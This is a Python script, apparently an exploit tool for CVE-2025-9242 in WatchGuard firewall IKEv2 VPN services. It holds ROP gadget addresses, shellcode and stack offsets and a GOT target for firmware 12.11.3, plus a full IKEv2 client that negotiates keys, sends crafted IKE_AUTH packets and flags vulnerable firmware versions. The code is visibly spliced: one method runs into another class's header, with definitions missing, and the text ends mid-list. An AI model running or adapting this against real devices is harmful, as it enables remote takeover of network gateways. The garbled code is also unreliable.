#!/usr/bin/env python3 import argparse import socket import struct import random import enum import hashlib import hmac import logging import base64 import binascii import re from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes from cryptography.hazmat.backends import default_backend # Configure logging logger = logging.getLogger(__name__) FW_VERSION = None BUILD_NUMBER = None class WatchGuardFw: ADDRESSES = { '12.11.3': { 'pop_rcx_ret': 0x4225ab, # 0x00000000004225ab: pop rcx; ret; 'mov_rax_rcx_ret': 0x5a4fac, # 0x00000000005a4fac: mov rax, rcx; ret; 'mov_rbp_rsp_call_rax': 0x42008d, # 0x000000000042008d: mov rbp, rsp; call rax; 'pop_r13_ret': 0x594ac4, # 0x0000000000594ac4: pop r13; ret; 'mov_rax_rbp_pop_rbx_pop_rbp_ret': 0x598d69, # 0x0000000000598d69: mov rax, rbp; pop rbx; pop rbp; ret; 'sub_rax_rcx_ret': 0x5a4fd8, # 0x00000000005a4fd8: sub rax, rcx; ret; 'push_rax_mov_rax_rbx_pop_rbx_ret': 0x5a4468, # 0x00000000005a4468: push rax; mov rax, rbx; pop rbx; ret; 'mov_rdi_rbx_call_rax': 0x42fce4, # 0x000000000042fce4: mov rdi, rbx; call rax; 'pop_rsi_ret': 0x508ece, # 0x0000000000508ece: pop rsi; ret; 'pop_rdx_ret': 0x483a4a, # 0x0000000000483a4a: pop rdx; ret; 'mov_rax_rax_ret': 0x5b145e, # 0x00000000005b145e: mov rax, qword ptr [rax]; ret; 'jmp_rax': 0x41908f, # 0x000000000041908f: jmp rax; 'jmp_rbx': 0x449ba3, # 0x0000000000449ba3: jmp rbx; 'offset_data': 0x00, # Offset from data 'offset_shellcode': 0x30, # Offset from buffer 'offset_stack': 0x340, # Offset from rsp to start of buffer 'offset_stack_page_aligned': 0x0cc8, # Offset from rsp to start of buffer page aligned 'offset_bind_mprotect': 0x5ea0, # Offset from mprotect to bind in libc.so 'got_bind': 0x658028, # GOT of bind }, } def __init__(self, version): self.version = version if version not in self.ADDRESSES: raise ValueError(f'Unsupported WatchGuard version: {version}') self.addresses = self.ADDRESSES[version] def get(self, name, fmt='QQBBBBII', initiator_spi, responder_spi, next_payload, version, exchange_type, flags, message_id, 0) @staticmethod def payload_header(next_payload, payload, critical = 0): return struct.pack('>BBH', next_payload, critical, 4 + len(payload)) + payload @staticmethod def security_association(next_payload, proposal): return IkePacker.payload_header(next_payload, proposal) @staticmethod def proposal(next_payload, number, id, transforms = [], spi = b''): b_transforms = b'' for transform in transforms: if isinstance(transform, IkeTransform): b_transforms += transform.pack() continue b_transforms += transform return IkePacker.payload_header(next_payload, struct.pack('>BBBB', number, id, len(spi), len(transforms)) + spi + b_transforms) @staticmethod def key_exchange(next_payload, dh_group, data, reserved = 0): return IkePacker.payload_header(next_payload, struct.pack('>HH', dh_group, reserved) + data) @staticmethod def nonce(next_payload, nonce): return IkePacker.payload_header(next_payload, nonce) @staticmethod def notify(next_payload, notify_type, data = b'', protocol_id = 1, spi_size = 0): return IkePacker.payload_header(next_payload, struct.pack('>BBH', protocol_id, spi_size, notify_type) + data) @staticmethod def vendor_id(next_payload, vendor_id): return IkePacker.payload_header(next_payload, vendor_id) @staticmethod def encrypted(next_payload, data): return IkePacker.payload_header(next_payload, data) @staticmethod def identification_initiator(next_payload, id_type, data, reserved=b'\x00\x00\x00'): return IkePacker.payload_header(next_payload, struct.pack('>B', id_type) + reserved + data) @staticmethod def certificate(next_payload, encoding, data): return IkePacker.payload_header(next_payload, struct.pack('>B', encoding) + data) @staticmethod def certificate_request(next_payload, type, data = []): return IkePacker.payload_header(next_payload, struct.pack('>B', type) + b''.join(data)) @staticmethod def authentication(next_payload, authentication_method, data, reserved=b'\x00\x00\x00'): return IkePacker.payload_header(next_payload, struct.pack('>B', authentication_method) + reserved + data) @staticmethod def eap(next_payload, type=1, data=b'', code = 1, identifier = 1): return IkePacker.payload_header(next_payload, struct.pack('>BBHB', code, identifier, len(data)+5, type) + data) @staticmethod def configuration(next_payload, configuration_type, attributes = [], reserved=b'\x00\x00\x00'): return IkePacker.payload_header(next_payload, struct.pack('>B', configuration_type) + reserved + b''.join(attributes)) @staticmethod def configuration_attribute(tag, value=b''): return struct.pack('>HH', tag, len(value)) + value @staticmethod def traffic_selector(next_payload, selectors = [], reserved=b'\x00\x00\x00'): return IkePacker.payload_header(next_payload, struct.pack('>B', len(selectors)) + reserved + b''.join(selectors)) @staticmethod def traffic_selector_ipv4_address_range(start_port, end_port, start_address, end_address): type = 7 # TS_IPV4_ADDR_RANGE protocol_id = 0 length = 16 start_address = struct.unpack('!L', socket.inet_aton(start_address))[0] end_address = struct.unpack('!L', socket.inet_aton(end_address))[0] return struct.pack('>BBHHHII', type, protocol_id, length, start_port, end_port, start_address, end_address) class IkeNotify: def __init__(self, protocol_id, message_type, spi, notification_data): self.protocol_id = protocol_id self.message_type = message_type self.spi = spi self.notification_data = notification_data @staticmethod def unpack(data): protocol_id, spi_size, message_type = struct.unpack('>2BH', data[:4]) spi = data[4:4 + spi_size] notification_data = data[4 + spi_size:] return IkeNotify(protocol_id, message_type, spi, notification_data) class IkeSecurityAssociation: def __init__(self, proposal): self.proposal = proposal @staticmethod def unpack(data): next_payload, critical, payload_length = IkeUnpacker.unpack_payload_header(data[:4]) if next_payload != PayloadType.NONE: raise IkeException(f"Expected payload type {PayloadType.NONE} but got {next_payload}") if len(data) != payload_length: raise IkeException(f"Expected payload length {payload_length} but got {len(data)}") return IkeSecurityAssociation(IkeProposal.unpack(data[4:])) class IkeProposal: def __init__(self, proposal_number, protocol_id, spi, transforms): self.proposal_number = proposal_number self.protocol_id = protocol_id self.spi = spi self.transforms = transforms @staticmethod def unpack(data): offset = 0 proposal_number, protocol_id, spi_size, num_transforms = struct.unpack('>BBBB', data[offset:offset+4]) offset += 4 spi = b'' if spi_size > 0: spi = data[offset:offset+spi_size] offset += spi_size transforms = [] for i in range(num_transforms): transform, size = IkeTransform.unpack(data[offset:]) transforms.append(transform) offset += size return IkeProposal(proposal_number, protocol_id, spi, transforms) class IkeTransform: def __init__(self, next_payload, transform_type, transform_id, transform_attributes=None, reserved=0): self.next_payload = next_payload self.transform_type = transform_type self.reserved = reserved self.transform_id = transform_id self.transform_attributes = transform_attributes def __str__(self): if self.transform_type == TransformType.ENCRYPTION_ALGORITHM: attr = '' if self.transform_attributes != None: if 14 in self.transform_attributes: # Key Length attr = f' ({self.transform_attributes[14]}-bit)' if self.transform_id in iter(EncryptionAlgorithm): return EncryptionAlgorithm(self.transform_id).name + attr return f'ENCR_{self.transform_id}{attr}' if self.transform_type == TransformType.PSEUDO_RANDOM_FUNCTION: if self.transform_id in iter(PseudoRandomFunction): return PseudoRandomFunction(self.transform_id).name return f'PRF_{self.transform_id}' if self.transform_type == TransformType.INTEGRITY_ALGORITHM: if self.transform_id in iter(IntegrityAlgorithm): return IntegrityAlgorithm(self.transform_id).name return f'AUTH_{self.transform_id}' if self.transform_type == TransformType.DIFFIE_HELLMAN_GROUP: if self.transform_id in iter(DiffieHellmanGroup): return DiffieHellmanGroup(self.transform_id).name return f'DH_{self.transform_id}' def pack(self): transform = struct.pack('>BBH', self.transform_type, self.reserved, self.transform_id) if self.transform_attributes: transform += struct.pack('>I', self.transform_attributes) return IkePacker.payload_header(self.next_payload, transform) @staticmethod def unpack(data): # Parse transform payload header offset = 0 next_payload, critical, payload_length = IkeUnpacker.unpack_payload_header(data[offset:offset+4]) offset += 4 if next_payload != PayloadType.NONE and next_payload != PayloadType.TRANSFORM: raise IkeException(f"Expected payload type {PayloadType.NONE} or {PayloadType.TRANSFORM} but got {next_payload}") # Parse transform data transform_type, reserved, transform_id = struct.unpack('>BBH', data[offset:offset+4]) offset += 4 # Parse transform attributes if present transform_attributes = None if payload_length > 8: fmt, type, value = struct.unpack('>BBH', data[offset:offset+4]) transform_attributes = {type: value} offset += 4 return IkeTransform(next_payload, transform_type, transform_id, transform_attributes, reserved), offset class IkeResponse: def __init__(self, initiator_spi, responder_spi, version, exchange_type, flags, message_id, length, payloads): self.initiator_spi = initiator_spi self.responder_spi = responder_spi self.version = version self.exchange_type = exchange_type self.flags = flags self.message_id = message_id self.length = length self.payloads = payloads def get(self, type): payloads = [] for payload in self.payloads: if payload['type'] == type: payloads.append(payload['payload']) return payloads class IkeUnpacker: @staticmethod def unpack_payload_header(data): return struct.unpack('>BBH', data[:4]) @staticmethod def unpack(response): initiator_spi, responder_spi, next_payload, version, exchange_type, flags, message_id, length = struct.unpack('>QQBBBBII', response[:28]) raw_payloads = response[28:] i = 0 payload_type = next_payload payloads = [] while i < len(raw_payloads): next_payload, critical, payload_length = IkeUnpacker.unpack_payload_header(raw_payloads[i:i+4]) payload = raw_payloads[i+4:i+payload_length] # Parsed Types if payload_type == PayloadType.NOTIFY: payload = IkeNotify.unpack(payload) elif payload_type == PayloadType.SECURITY_ASSOCIATION: payload = IkeSecurityAssociation.unpack(payload) payloads.append({ 'type': payload_type, 'critical': critical, 'payload': payload }) i += payload_length payload_type = next_payload return IkeResponse( initiator_spi, responder_spi, version, exchange_type, flags, message_id, length, payloads ) class IkeCrypto: def __init__(self): self.initiator_nonce = self.generate_nonce(32) self.responder_nonce = None self.initiator_spi = random.randint(0, 0xffffffffffffffff) self.responder_spi = 0x0000000000000000 self.client_private_key = None self.client_public_key = None self.client_public_key_bytes = None self.server_public_key_bytes = None self.shared_secret = None self.skeyseed = None self.SK_d = None self.SK_ai = None self.SK_ar = None self.SK_ei = None self.SK_er = None # Encryption: AES-CBC-256, Integrity: HMAC-SHA2-256-128, DH: MODP-14, PRF: SHA256 self.generate_keys = self.dh_modp_14_generate_keys self.compute_shared_secret = self.dh_modp_14_compute_shared_secret self.prf = self.prf_sha256 self.encrypt = self.encrypt_aes_cbc self.compute_integrity = self.compute_integrity_sha256 self.generate_keys() def key_exchange(self, responder_spi, responder_nonce, server_public_key_bytes): self.responder_spi = responder_spi self.responder_nonce = responder_nonce self.server_public_key_bytes = server_public_key_bytes self.shared_secret = self.compute_shared_secret() # Generate SKEYSEED and derive keys self.generate_skeyseed() self.derive_keys() def generate_nonce(self, length=32): """Generate a cryptographically secure nonce""" return random.getrandbits(length * 8).to_bytes(length, 'big') def dh_modp_14_generate_keys(self): # Generate our private key for DH exchange (MODP group 14 = 2048-bit) # RFC 3526 MODP Group 14 prime - The standard 2048-bit DH prime p_hex = 'FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF' self.p = int(p_hex, 16) # Verify this is exactly 2048 bits if self.p.bit_length() != 2048: self.p = self.p >> (self.p.bit_length() - 2048) g = 2 # Generate our private key (random number between 1 and p-1) self.client_private_key = random.randint(1, self.p - 1) # Compute our public key: g^private_key mod p self.client_public_key = pow(g, self.client_private_key, self.p) # Convert to bytes (256 bytes for 2048-bit MODP group) # Calculate the required byte length for this public key public_key_bit_length = self.client_public_key.bit_length() public_key_byte_length = (public_key_bit_length + 7) // 8 # Round up to nearest byte # For MODP Group 14, the public key should be at most 256 bytes (2048 bits) # But we need to handle cases where it might be smaller if public_key_byte_length > 256: raise ValueError(f"Public key too large: {public_key_byte_length} bytes (max 256)") # Convert to bytes and pad with leading zeros to make it exactly 256 bytes self.client_public_key_bytes = self.client_public_key.to_bytes(public_key_byte_length, 'big').rjust(256, b'\x00') def dh_modp_14_compute_shared_secret(self): # Perform DH key exchange # Convert server's public key from bytes to integer server_public_key = int.from_bytes(self.server_public_key_bytes, 'big') # Compute the shared secret: server_public_key^client_private_key mod p dh_shared_secret_int = pow(server_public_key, self.client_private_key, self.p) # Convert shared secret to bytes with proper padding shared_secret_bit_length = dh_shared_secret_int.bit_length() shared_secret_byte_length = (shared_secret_bit_length + 7) // 8 if shared_secret_byte_length > 256: raise ValueError(f"Shared secret too large: {shared_secret_byte_length} bytes (max 256)") # Convert to bytes and pad to 256 bytes dh_shared_secret = dh_shared_secret_int.to_bytes(shared_secret_byte_length, 'big').rjust(256, b'\x00') # Pad to 256 bytes return dh_shared_secret def prf_sha256(self, key, data): """PRF using SHA256""" return hmac.new(key, data, hashlib.sha256).digest() def prf_plus(self, prf_func, key, seed, length): """IKEv2 PRF+ function - RFC 4306 compliant""" result = b'' prev = b'' counter = 1 while len(result) < length: # RFC 4306: PRF(SKEYSEED, Ni | Nr | SPIi | SPIr | counter) # where counter is 1 byte and we chain the previous output data = prev + seed + struct.pack('!B', counter) # 1-byte counter + chaining prev = prf_func(key, data) result += prev counter += 1 return result[:length] def generate_skeyseed(self): """Generate SKEYSEED from DH shared secret and nonces""" # RFC 4306: SKEYSEED = prf(Ni | Nr, g^ir) # Key: Ni | Nr (nonces), Data: g^ir (DH shared secret) self.skeyseed = self.prf(self.initiator_nonce + self.responder_nonce, self.shared_secret) return self.skeyseed def derive_keys(self): """Derive IKEv2 keys from SKEYSEED""" # Create the seed for key derivation # RFC 4306: {SK_d | SK_ai | SK_ar | SK_ei | SK_er} = prf+(SKEYSEED, Ni | Nr | SPIi | SPIr) # Seed: Ni | Nr | SPIi | SPIr (nonces first, then SPIs) seed = self.initiator_nonce + self.responder_nonce + self.initiator_spi.to_bytes(8, 'big') + self.responder_spi.to_bytes(8, 'big') # Derive keys using PRF+ (PRF_HMAC_SHA2_256) # RFC 4306: {SK_d | SK_ai | SK_ar | SK_ei | SK_er} = prf+(SKEYSEED, Ni | Nr | SPIi | SPIr) # Each key is 32 bytes (SHA256 output), so we need 5 * 32 = 160 bytes total derived_keys = self.prf_plus(self.prf, self.skeyseed, seed, 160) # 160 bytes total (5 * 32 bytes) # Split into individual keys according to RFC 4306 self.SK_d = derived_keys[0:32] # For deriving child SA keys self.SK_ai = derived_keys[32:64] # Authentication key for initiator self.SK_ar = derived_keys[64:96] # Authentication key for responder self.SK_ei = derived_keys[96:128] # Encryption key for initiator self.SK_er = derived_keys[128:160] # Encryption key for responder def generate_iv(self, key, nonce): """Generate IV for encryption""" # For IKEv2, IV is typically derived from the key and nonce # Using a simple approach: hash of key + nonce, truncated to 16 bytes return hashlib.sha256(key + nonce).digest()[:16] def encrypt_aes_cbc(self, data, key, iv): """Encrypt data using AES-CBC""" cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend()) encryptor = cipher.encryptor() # Pad data to block size (16 bytes for AES) padding_length = 16 - (len(data) % 16) padded_data = data + bytes([padding_length-1] * padding_length) return encryptor.update(padded_data) + encryptor.finalize() def compute_integrity_sha256(self, data, key): """Compute integrity checksum using HMAC-SHA256""" return hmac.new(key, data, hashlib.sha256).digest() class IkeException(Exception): pass class IkeNoProposalChosenException(IkeException): pass class IkeInvalidKEPayloadException(IkeException): pass class IkeMissingNonceException(IkeException): pass class IkeMissingKeyExchangeException(IkeException): pass class Ike: def __init__(self, ip, port, timeout = 5): self.ip = ip self.port = port self.timeout = timeout self.crypto = None self.sock = None self.reset() @staticmethod def update_request_length(request): """Update the length field in the header""" total_length = len(request) return request[:24] + struct.pack('>I', total_length) + request[28:] def reset(self): if self.sock != None: self.close() self.crypto = IkeCrypto() self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.sock.settimeout(self.timeout) def send(self, packet): self.sock.sendto(packet, (self.ip, self.port)) response, addr = self.sock.recvfrom(65535) return IkeUnpacker.unpack(response) def send_encrypted(self, exchange_type, message_id, payloads): # Create the IKE header first request = IkePacker.header(self.crypto.initiator_spi, self.crypto.responder_spi, PayloadType.ENCRYPTED, exchange_type, message_id) # Encrypt the inner payloads iv = self.crypto.generate_iv(self.crypto.SK_ei, self.crypto.initiator_nonce) encrypted_data = self.crypto.encrypt(payloads, self.crypto.SK_ei, iv) # Create the encrypted payload integrity_data = (b"\x00" * 16) request += IkePacker.encrypted(PayloadType.IDENTIFIER_INITIATOR, iv + encrypted_data + integrity_data) # Update the length field in the header request = Ike.update_request_length(request) # Compute integrity checksum over the entire message (including updated length, excluding integrity checksum) integrity_data = self.crypto.compute_integrity(request[:-16], self.crypto.SK_ai)[:16] # 16 bytes for AUTH_HMAC_SHA2_256_128 # Replace integrity checksum request = request[:-16] + integrity_data return self.send(request) def close(self): self.sock.close() self.sock = None def sa_init(self, default_transforms = None): global FW_VERSION, BUILD_NUMBER dh_group = DiffieHellmanGroup.DH_GROUP_2048_BIT_MODP.value key_exchange = self.crypto.client_public_key_bytes # Group 14 = 2048 bit MODP group transforms = default_transforms if default_transforms is None: transforms = [ IkeTransform(PayloadType.TRANSFORM, TransformType.ENCRYPTION_ALGORITHM, EncryptionAlgorithm.ENCR_AES_CBC.value, 0x800e0100), IkeTransform(PayloadType.TRANSFORM, TransformType.PSEUDO_RANDOM_FUNCTION, PseudoRandomFunction.PRF_HMAC_SHA2_256.value), IkeTransform(PayloadType.TRANSFORM, TransformType.INTEGRITY_ALGORITHM, IntegrityAlgorithm.AUTH_HMAC_SHA2_256_128.value), IkeTransform(PayloadType.NONE, TransformType.DIFFIE_HELLMAN_GROUP, DiffieHellmanGroup.DH_GROUP_2048_BIT_MODP.value), ] else: # If we are not using default transforms, fake the key exchange payload for transform in transforms: if transform.transform_type == TransformType.DIFFIE_HELLMAN_GROUP: dh_group = transform.transform_id if dh_group != DiffieHellmanGroup.DH_GROUP_2048_BIT_MODP: key_sizes = { 8192: [ DiffieHellmanGroup.DH_GROUP_8192_BIT_MODP, ], 6144: [ DiffieHellmanGroup.DH_GROUP_6144_BIT_MODP, ], 4096: [ DiffieHellmanGroup.DH_GROUP_4096_BIT_MODP, ], 3072: [ DiffieHellmanGroup.DH_GROUP_3072_BIT_MODP, ], 2048: [ DiffieHellmanGroup.DH_GROUP_2048_BIT_MODP_WITH_224_BIT_PRIME_ORDER_SUBGROUP, DiffieHellmanGroup.DH_GROUP_2048_BIT_MODP_WITH_256_BIT_PRIME_ORDER_SUBGROUP, ], 1536: [ DiffieHellmanGroup.DH_GROUP_1536_BIT_MODP, ], 1024: [ DiffieHellmanGroup.DH_GROUP_1024_BIT_MODP, DiffieHellmanGroup.DH_GROUP_1024_BIT_MODP_WITH_160_BIT_PRIME_ORDER_SUBGROUP, DiffieHellmanGroup.ML_KEM_1024, ], 768: [ DiffieHellmanGroup.DH_GROUP_768_BIT_MODP, DiffieHellmanGroup.ML_KEM_768, ], 521: [ DiffieHellmanGroup.RANDOM_ECP_GROUP_521_BIT, ], 512: [ DiffieHellmanGroup.BRAINPOOLP512R1, DiffieHellmanGroup.GOST3410_2012_512, DiffieHellmanGroup.ML_KEM_512, ], 448: [ DiffieHellmanGroup.CURVE448, ], 384: [ DiffieHellmanGroup.RANDOM_ECP_GROUP_384_BIT, DiffieHellmanGroup.BRAINPOOLP384R1, ], 256: [ DiffieHellmanGroup.RANDOM_ECP_GROUP_256_BIT, DiffieHellmanGroup.BRAINPOOLP256R1, DiffieHellmanGroup.CURVE25519, DiffieHellmanGroup.GOST3410_2012_256, ], 224: [ DiffieHellmanGroup.RANDOM_ECP_GROUP_224_BIT, DiffieHellmanGroup.BRAINPOOLP224R1, ], 192: [ DiffieHellmanGroup.RANDOM_ECP_GROUP_192_BIT, ] } found = False for size in key_sizes: for group in key_sizes[size]: if group == dh_group: key_exchange = b'\x00' * (size//8) found = True break if found: break # Send request and process response r = self.send(Ike.update_request_length( IkePacker.header(self.crypto.initiator_spi, self.crypto.responder_spi, PayloadType.SECURITY_ASSOCIATION, ExchangeType.IKE_SA_INIT, 0) + IkePacker.security_association(PayloadType.KEY_EXCHANGE, IkePacker.proposal(PayloadType.NONE, 1, 1, transforms)) + IkePacker.key_exchange(PayloadType.NONCE, dh_group, key_exchange) + IkePacker.nonce(PayloadType.NOTIFY, self.crypto.initiator_nonce) + IkePacker.notify(PayloadType.NOTIFY, NotifyType.NAT_DETECTION_DESTINATION_IP, bytes.fromhex('a6358d813592fdd80a9aaa3390f39c8a5a76b6e4')) + IkePacker.notify(PayloadType.VENDOR_ID, NotifyType.NAT_DETECTION_SOURCE_IP, bytes.fromhex('4cc324152ba3f68ef649ac1e6f96f33791611db2')) + IkePacker.vendor_id(PayloadType.VENDOR_ID, bytes.fromhex('c590254e5403cbb71f3d493111d7fcad')) + IkePacker.vendor_id(PayloadType.VENDOR_ID, bytes.fromhex('c61baca1f1a60cc10800000000000000')) + IkePacker.vendor_id(PayloadType.VENDOR_ID, bytes.fromhex('4048b7d56ebce88525e7de7f00d6c2d3c0000000')) + IkePacker.vendor_id(PayloadType.NOTIFY, bytes.fromhex('4048b7d56ebce88525e7de7f00d6c2d3')) + IkePacker.notify(PayloadType.NOTIFY, NotifyType.IKEV2_FRAGMENTATION_SUPPORTED, protocol_id = 0) + IkePacker.notify(PayloadType.NOTIFY, NotifyType.REDIRECT_SUPPORTED, protocol_id = 0) + IkePacker.notify(PayloadType.NONE, NotifyType.SIGNATURE_HASH_ALGORITHMS, bytes.fromhex('0001000200030004'), protocol_id = 0) )) responder_spi = r.responder_spi # Check for Watchguard firmware version if FW_VERSION == None: vendors = r.get(PayloadType.VENDOR_ID) for vendor in vendors: # WatchGuard vendor id if len(vendor) > 32 and vendor[:8].hex() == 'bfc22e9856ba9936': try: watchguard_data = base64.b64decode(vendor[32:].decode('ascii')).decode() logging.debug(f'[#] WatchGuard vendor data: {watchguard_data}') # VN=12.11.3 BN=719894 # VN=12.11.4 BN=722644 match = re.search(r"VN=([0-9\.]+) BN=([0-9]+)", watchguard_data) if match: FW_VERSION = match.group(1) BUILD_NUMBER = match.group(2) logging.info(f'[#] WatchGuard Firmware Version: {FW_VERSION}') logging.info(f'[#] WatchGuard Build Number: {BUILD_NUMBER}') if WatchGuardFw.version_tuple(FW_VERSION) < WatchGuardFw.version_tuple("12.11.4"): logging.info(f"[+] IKEv2 service is vulnerable to CVE-2025-9242 based on version number {FW_VERSION} < 12.11.4") else: logging.info(f"[-] IKEv2 service is patched against CVE-2025-9242 based on version number {FW_VERSION} >= 12.11.4") except UnicodeDecodeError: logging.debug(f'[#] Unicode decode error while decoding {watchguard_data}') continue except binascii.Error: logging.debug(f'[#] Base64 decode error while decoding {vendor[32:].decode('ascii')}') continue # Check for errors notifications = r.get(PayloadType.NOTIFY) for notification in notifications: if notification.message_type == NotifyType.NO_PROPOSAL_CHOSEN: raise IkeNoProposalChosenException() if notification.message_type == NotifyType.INVALID_KE_PAYLOAD: raise IkeInvalidKEPayloadException() # Only get crypto when using default transforms if default_transforms is None: # Get responder nonce and server public key from response responder_nonce = r.get(PayloadType.NONCE) server_public_key_bytes = r.get(PayloadType.KEY_EXCHANGE) if len(responder_nonce) != 1: raise IkeMissingNonceException() if len(server_public_key_bytes) != 1: raise IkeMissingKeyExchangeException() # Perform key exchange self.crypto.key_exchange(responder_spi, responder_nonce[0], server_public_key_bytes[0][4:]) # Skip 4-byte header # Print keys for Wireshark logger.debug(f'\n=== Wireshark ikev2_decryption_table ===') logger.debug(f'* Initiator\'s SPI: {self.crypto.initiator_spi:016x}') logger.debug(f'* Responder\'s SPI: {self.crypto.responder_spi:016x}') logger.debug(f'* SK_ei: {self.crypto.SK_ei.hex()}') logger.debug(f'* SK_er: {self.crypto.SK_er.hex()}') logger.debug(f'* Encryption algorithm: "AES-CBC-256 [RFC3602]"') logger.debug(f'* SK_ai: {self.crypto.SK_ai.hex()}') logger.debug(f'* SK_ar: {self.crypto.SK_ar.hex()}') logger.debug(f'* Integrity algorithm: "HMAC_SHA2_256_128 [RFC4868]"') logger.debug(f'========================\n') return r def auth(self, identification_initiator=b'WatchGuard'): return self.send_encrypted(ExchangeType.IKE_AUTH, 1, ( IkePacker.identification_initiator(PayloadType.CERTIFICATE, 2, identification_initiator) + IkePacker.certificate(PayloadType.NOTIFY, 4, bytes.fromhex('308202d330820279a003020102020401000013300a06082a8648ce3d040302304b310b3009060355040613024445310f300d0603550408130642617965726e310c300a060355040a13034e4350311d301b060355040313144e43502044656d6f2043412045434320323035303022180f32303136303830343038303031335a180f32303530303830353038303031335a3074310b3009060355040613024445311a3018060355040a0c1144656d6f204f7267616e697a6174696f6e3110300e060355040b0c0744656d6f204f553110300e06035504030c07436c69656e74313125302306092a864886f70d0109011616636c69656e74314064656d6f2e6e63702d652e636f6d3059301306072a8648ce3d020106082a8648ce3d03010703420004b74572a1b5dd1c4cafdab7f06a92913cab7ee2a55106efa4056e2dc17369600510553454e37e69e9a08c5abae5a05a77e01ebb04e4b272fe349f12a34088ceeaa382011c3082011830090603551d1304023000300b0603551d0f0404030205a0301d0603551d250416301406082b0601050507030206082b06010505070307301d0603551d0e041604145a5e6aa29f89959131c17018ef64dc2a8a4a4a6a30750603551d23046e306c801425db6d44dec7a03eb5f8623ab18784546a0f0409a14fa44d304b310b3009060355040613024445310f300d0603550408130642617965726e310c300a060355040a13034e4350311d301b060355040313144e43502044656d6f204341204543432032303530820302000230490603551d1104423040a026060a2b060104018237140203a0180c16436c69656e74314064656d6f2e6e63702d652e636f6d8116436c69656e74314064656d6f2e6e63702d652e636f6d300a06082a8648ce3d04030203480030450220602d766db7e07b70d88e3810acc6cd350ccdda1e60d77bd36ed6e60f869ef371022100d1e3d278fcacf41cd8380691363ad3933d6bc293fae9c847ddf6187bb0f06f49')) + IkePacker.notify(PayloadType.NOTIFY, NotifyType.INITIAL_CONTACT) + IkePacker.notify(PayloadType.CERTIFICATE_REQUEST, NotifyType.HTTP_CERT_LOOKUP_SUPPORTED) + IkePacker.certificate_request(PayloadType.CONFIGURATION, 4, []) + IkePacker.configuration(PayloadType.SECURITY_ASSOCIATION, 1, [ IkePacker.configuration_attribute(ConfigurationAttribute.INTERNAL_IP4_ADDRESS), IkePacker.configuration_attribute(ConfigurationAttribute.INTERNAL_IP4_NETMASK), IkePacker.configuration_attribute(ConfigurationAttribute.INTERNAL_IP4_DNS), IkePacker.configuration_attribute(ConfigurationAttribute.INTERNAL_IP4_MBNS), IkePacker.configuration_attribute(20002), IkePacker.configuration_attribute(ConfigurationAttribute.INTERNAL_IP6_ADDRESS), IkePacker.configuration_attribute(9), IkePacker.configuration_attribute(ConfigurationAttribute.INTERNAL_IP6_DNS ), IkePacker.configuration_attribute(25), IkePacker.configuration_attribute(ConfigurationAttribute.APPLICATION_VERSION), IkePacker.configuration_attribute(28672), IkePacker.configuration_attribute(28673), IkePacker.configuration_attribute(28674), IkePacker.configuration_attribute(20006), IkePacker.configuration_attribute(20007), IkePacker.configuration_attribute(28675), IkePacker.configuration_attribute(28676), IkePacker.configuration_attribute(28677), IkePacker.configuration_attribute(28678), IkePacker.configuration_attribute(28679), IkePacker.configuration_attribute(28680), IkePacker.configuration_attribute(28681), IkePacker.configuration_attribute(20003), IkePacker.configuration_attribute(20004), IkePacker.configuration_attribute(28682), IkePacker.configuration_attribute(20005, b'debian'), IkePacker.configuration_attribute(28682, b'debian'), ]) + IkePacker.security_association(PayloadType.TRAFFIC_SELECTOR_INITIATOR, IkePacker.proposal(PayloadType.NONE, 1, 3, [ IkeTransform(PayloadType.TRANSFORM, TransformType.ENCRYPTION_ALGORITHM, EncryptionAlgorithm.ENCR_AES_CBC.value, 0x800e0100), IkeTransform(PayloadType.TRANSFORM, TransformType.PSEUDO_RANDOM_FUNCTION, PseudoRandomFunction.PRF_HMAC_SHA2_256.value), IkeTransform(PayloadType.TRANSFORM, TransformType.INTEGRITY_ALGORITHM, IntegrityAlgorithm.AUTH_HMAC_SHA2_256_128.value), IkeTransform(PayloadType.NONE, TransformType.DIFFIE_HELLMAN_GROUP, DiffieHellmanGroup.DH_GROUP_2048_BIT_MODP.value), ], spi=b'\xc1\xa9\x65\x6b')) + IkePacker.traffic_selector(PayloadType.TRAFFIC_SELECTOR_RESPONDER, [ IkePacker.traffic_selector_ipv4_address_range(0, 65535, '0.0.0.0', '255.255.255.255'), ]) + IkePacker.traffic_selector(PayloadType.VENDOR_ID, [ IkePacker.traffic_selector_ipv4_address_range(0, 65535, '0.0.0.0', '255.255.225.255'), ]) + IkePacker.vendor_id(PayloadType.NOTIFY, bytes.fromhex('afcad71368a1f1c96b8696fc77570100')) + IkePacker.notify(PayloadType.NOTIFY, NotifyType.MOBIKE_SUPPORTED, protocol_id = 0) + IkePacker.notify(PayloadType.NONE, NotifyType.MULTIPLE_AUTH_SUPPORTED, protocol_id = 0) )) class IkeTransformGroup: def __init__(self): self.encryption_algorithm = None self.pseudo_random_function = None self.integrity_algorithm = None self.diffie_hellman_group = None class RunnerStatus(enum.IntEnum): SUCCESS = 0 TIMEOUT = 1 NO_PROPOSAL_CHOSEN = 2 SA_INIT_FAILED = 3 class Runner: @staticmethod def check_default_transform(ike): logging.info(f'[#] Sending IKEv2 SA Init with default transform') ike.reset() try: ike.sa_init() except TimeoutError: logging.debug(f'[#] Timeout') return RunnerStatus.TIMEOUT except IkeNoProposalChosenException: logging.debug(f'[#] No proposal chosen') return RunnerStatus.NO_PROPOSAL_CHOSEN finally: ike.close() return RunnerStatus.SUCCESS @staticmethod def enumerate_transforms(ike): # See: https://www.iana.org/assignments/ikev2-parameters/ikev2-parameters.xhtml encryptions = { 'ENCR_DES_IV64': {'id': 1}, 'ENCR_DES': {'id': 2}, 'ENCR_3DES': {'id': 3}, 'ENCR_RC5': {'id': 4}, 'ENCR_IDEA': {'id': 5}, 'ENCR_CAST': {'id': 6}, 'ENCR_BLOWFISH': 